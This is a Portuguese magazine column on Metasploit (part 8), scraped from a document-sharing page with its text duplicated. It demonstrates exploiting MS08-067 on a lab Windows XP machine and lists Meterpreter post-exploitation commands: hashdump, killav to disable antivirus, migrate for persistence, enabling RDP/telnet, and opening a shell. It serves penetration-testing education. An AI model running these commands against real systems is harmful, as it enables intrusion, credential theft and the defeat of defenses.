2
10 www.linuxmagazine.com.br O Metasploit disponibiliza um payload especial chamado de Meterpreter, que proporciona ampla interação com a máquina alvo após a invasão, assim como uma inteligente coleta de dados e possibilidade de execução de uma ampla variedade de scripts. Não são em todos os casos de invasão que existe a possibilidade de utiliza- ção o Meterpreter como payload de controle, no entanto, em grande parte das ocorrências isto é possível e, inclusive, recomendado. Nesta coluna, ao invés de mostrar a execução dos comandos, vamos aprender a trabalhar com alguns deles, suas opções e scripts, e, se necessário, visualizar a saída resultante. Isto é um convite para que o leitor possa fazer seus próprios experimentos e observar com detalhes o resultado de comandos ou scripts, os quais não seriam factíveis incluir nesta coluna devido ao seu espaço reduzido. O ambiente que foi utilizado têm máquinas vir- tuais WMware ou VirtualBox, sendo que uma de- las possui o Kali Linux versão 1.6 – 64 bits e a outra executa o Windows XP SP2 – 32 bits. Ambas estão usando uma conexão com o mundo externo do tipo NAT onde o Kali tem endereço IP 192.168.81.128 e o Windows tem endereço IP 192.168.81.132. A primei- ra etapa, mais simples, é realizar a exploração em busca de uma falha do WinXP e para isso você já aprendeu nas colunas anteriores que pode fazer uso do OpenVAS ou do Nesssus para lis- tar as vulnerabilidades. Deste ponto, podemos usar o Metasploit (figura 1). O comando show payloads listará os payloads que podem ser utilizados e enviados para a máquina explo- rada, entretanto somente alguns envolvem o Meterpreter. Por isto, vamos incluí-lo: msf exploit(ms08_067_netapi) > set payload windows/ meterpreter/bind_tcp Deste ponto em diante estamos prontos para explorar a vulnerabilidade citada e isto é feito de acordo com a figura 2. Como o leitor pode notar, o sistema foi invadido com sucesso. Deste ponto, utilizando o meterpre- ter como payload, o mesmo criou uma sessão para a máquina alvo, nos proporcionando um enorme leque de alternativas onde uma lista com algumas opções possíveis seguem abaixo: ps » observa todos os processos sendo executados na máquina invadida; getid » evidencia com qual usuário estamos loga- dos após a invasão; sysinfo » mostra informações do sistema invadido screenshot » tira uma foto do deskop da máquina inva- dia e a armazena no diretório /root; getpid » obtém o PID do processo que está sendo exe- cutado depois de ter invadido a máquina; migrate <pid> » migra a sessão usada pelo Meter- preter para outro processo que seja persistente (figura 3). O motivo disto é evitar que o usuário da máquina invadida termine o processo no qual estamos conectados e, com isto, seja perdido o acesso ao host por parte do hacker; hashdump » realiza um “dump” do SAM (Security Ac- count Manager). Todavia, para que isto possa ser feito com sucesso, devemos nos conectar como SYSTEM. Caso este não seja o caso, tente elevar o Coluna do Alexandre Metasploit – parte 8 Comandos úteis do Meterpreter tendo como alvo o sistema operacional Windows XP para ataques direcionados. por Alexandre Borges Figura 1 Console do Metasploit. Figura 2 Exploração bem sucedida de vulnerabilidade. root@kali:~# msfconsole msf > search ms08-067 msf > use exploit/windows/ smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST 192.168.81.132 msf exploit(ms08_067_netapi) > show payloads

Coluna do Alexandre Metasploit – parte 8 · Não são em todos os casos ... las possui o Kali Linux versão 1.6 – 64 bits e a outra executa o Windows XP SP2 – 32 bits. Ambas

  • Upload
    buikiet

  • View
    216

  • Download
    0

Embed Size (px)

Citation preview

10 www.linuxmagazine.com.br

O Metasploit disponibiliza um payload especial chamado de Meterpreter, que proporciona ampla interação com a máquina alvo após

a invasão, assim como uma inteligente coleta de dados e possibilidade de execução de uma ampla variedade de scripts. Não são em todos os casos de invasão que existe a possibilidade de utiliza-ção o Meterpreter como payload de controle, no entanto, em grande parte das ocorrências isto é possível e, inclusive, recomendado. Nesta coluna, ao invés de mostrar a execução dos comandos, vamos aprender a trabalhar com alguns deles, suas opções e scripts, e, se necessário, visualizar a saída resultante. Isto é um convite para que o leitor possa fazer seus próprios experimentos e observar com detalhes o resultado de comandos ou scripts, os quais não seriam factíveis incluir nesta coluna devido ao seu espaço reduzido.

O ambiente que foi utilizado têm máquinas vir-tuais WMware ou VirtualBox, sendo que uma de-las possui o Kali Linux versão 1.6 – 64 bits e a outra executa o Windows XP SP2 – 32 bits. Ambas estão usando uma conexão com o mundo externo do tipo NAT onde o Kali tem endereço IP 192.168.81.128 e o Windows tem endereço IP 192.168.81.132. A primei-ra etapa, mais simples, é realizar a exploração em busca de uma falha do WinXP e para isso você já aprendeu nas colunas anteriores que pode fazer

uso do OpenVAS ou do Nesssus para lis-tar as vulnerabilidades. Deste ponto,

podemos usar o Metasploit (figura 1). O comando show payloads listará os payloads que podem ser utilizados e enviados para a máquina explo-rada, entretanto somente alguns

envolvem o Meterpreter. Por isto, vamos incluí-lo:

msf exploit(ms08_067_netapi) > set payload windows/

meterpreter/bind_tcp

Deste ponto em diante estamos prontos para

explorar a vulnerabilidade citada e isto é feito de acordo com a figura 2.

Como o leitor pode notar, o sistema foi invadido com sucesso. Deste ponto, utilizando o meterpre-ter como payload, o mesmo criou uma sessão para a máquina alvo, nos proporcionando um enorme leque de alternativas onde uma lista com algumas opções possíveis seguem abaixo: ps » observa todos os processos sendo executados na máquina invadida;getid » evidencia com qual usuário estamos loga-dos após a invasão;sysinfo » mostra informações do sistema invadidoscreenshot » tira uma foto do deskop da máquina inva-dia e a armazena no diretório /root;getpid » obtém o PID do processo que está sendo exe-cutado depois de ter invadido a máquina;migrate <pid> » migra a sessão usada pelo Meter-preter para outro processo que seja persistente (figura 3). O motivo disto é evitar que o usuário da máquina invadida termine o processo no qual estamos conectados e, com isto, seja perdido o acesso ao host por parte do hacker; hashdump » realiza um “dump” do SAM (Security Ac-count Manager). Todavia, para que isto possa ser feito com sucesso, devemos nos conectar como SYSTEM. Caso este não seja o caso, tente elevar o

Coluna do Alexandre

Metasploit – parte 8Comandos úteis do Meterpreter tendo como alvo o sistema operacional Windows XP para ataques direcionados. por Alexandre Borges

Figura 1 Console do Metasploit.

Figura 2 Exploração bem sucedida de vulnerabilidade.

root@kali:~# msfconsolemsf > search ms08-067msf > use exploit/windows/ smb/ms08_067_netapimsf exploit(ms08_067_netapi) > show optionsmsf exploit(ms08_067_netapi) > set RHOST 192.168.81.132msf exploit(ms08_067_netapi) > show payloads

11Linux Magazine #108 | Fevereiro de 2014

Comandos úteis do Meterpreter tendo como alvo o sistema operacional Windows XP para ataques direcionados. por Alexandre Borges

privilégio com o comando use priv antes do co-mando hashdump. Após obter os hashes, uma opção seria usar um cracker como “John the Ripper” ou “L0phtCrack” para descobrir as senhas. Escrevi um tutorial simples sobre o assunto que pode ser acessado em [1];background » deixa a sessão do Meterpreter em segun-do plano e volta para o prompt normal do msfconsole; sessions -l » lista as sessões ativas do Meterpreter;session -i » assume uma sessão do Meterpreter de forma interativa; run checkvm » verifca se a máquina explorada é exe-cutado em uma máquina virtual ou não; run getcountermeasure » realiza a verificação de quais medidas de segurança estão implementadas na máquina alvo; run killav » desabilita programas antivirus que es-tão em execução na máquina de destino; run scraper » coleta diversas informações sobre o sistema alvo, incluindo o registro no caso de má-quinas Windows, e salva em um diretório local (como /root/.msf4/logs/scripts/scraper);

run getgui -e » habilita o Remote Desktop Protocol (RDP) na máquina alvo caso ele esteja desabilitado (figura 4).run winenum » executa enumeração completa da máquina alvo; run gettelnet -e » habilita o serviço de telnet no destino.run shell » abre um shell para a máquina hackea-da (figura 5). n

Figura 4 RDP na máquina alvo.

Figura 5 Abertura de shell na máquina hackaeada.

Figura 3 Transferência da sessão ativa do Meterpreter.

Mais informações[1] Como descobrir senhas: http://alexandreborges.org/2013/08/05/introduction-to-password-cracking-part-1/

Rua Viúva Cláudio, 291 – Rio de Janeiro - RJ Tels: (21) 3278-8069 | (21) 3278-8159

/altabooks alta_books

Conheça também:

Código:

lnx2014

Todos os livros

do nosso site com

30% de desconto

com o código

promocional*

* Promoção válida por tempo limitado, somente para compras realizadas no site www.altabooks.com.br

www.altabooks.com.br

ALTA BOOKSE D I T O R A

Distribuidora exclusiva da Série linux Pro

linux magazine janeiro 2014.indd 1 06/02/2014 14:52:10